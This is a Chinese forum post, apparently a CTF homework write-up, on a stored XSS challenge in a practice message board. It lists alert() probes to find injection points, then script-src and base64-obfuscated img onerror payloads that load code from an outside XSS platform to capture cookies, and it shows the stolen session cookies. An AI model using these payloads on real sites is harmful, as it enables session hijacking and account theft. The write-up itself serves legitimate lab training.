tester作业提交(靶场第四章:为了更多的权限!留言板)

tester   ·   发表于 2018-8-7   ·   CTF&WP专版

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的


1. 在不同的文本框中输入:

主题:<script>alert('1')</script>

内容:<script>alert('2')</script>

公司名称:<script>alert('3')</script>

公司地址:<script>alert('4')</script>

。。。

以此类推如果提交成功后,界面刷新,弹出1,则说明主题这里的script执行了,弹出2,说明内容中的script被执行了,那么XSS插入点就在主题或者内容这里


2. xss平台:http://xsspt.com

设置好后,如何使用:


将如下代码植入怀疑出现XSS的地方(注意'的转义),在即可项目内容观看XSS效果。

<script src = http://xsspt.com/hpwXbJ?1533043629> </ script>

或者以你任何想要的方式插入

http://xsspt.com/hpwXbJ?1533043629

*************************************************网址缩短*************************************************

再或者以你任何想要的方式插入<script src = http://t.cn/ReY6wWS> </ script>

再或者以你任何想要的方式插入

<img src = x onerror = eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL2hwd1hiSj8nK01hdGgucmFuZG9tKCk ='))>


在主题处输入<script src = http://xsspt.com/hpwXbJ?1533043629> </ script>


提交后在xsspt中查看cookie,flag在cookie中

  • cookie : ASPSESSIONIDSAACTTTA=PEIDCBDDPNAFBBKAHOJAKBIC; flag=zkz{********},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC;

  • 打赏我,让我更有动力~

    0 Reply   |  Until 2018-8-7 | 541 View
    LoginCan Publish Content
    返回顶部 投诉反馈

    掌控者 © 2016 - 2020. All Rights Reserved. 掌控者

    Powered by 掌控者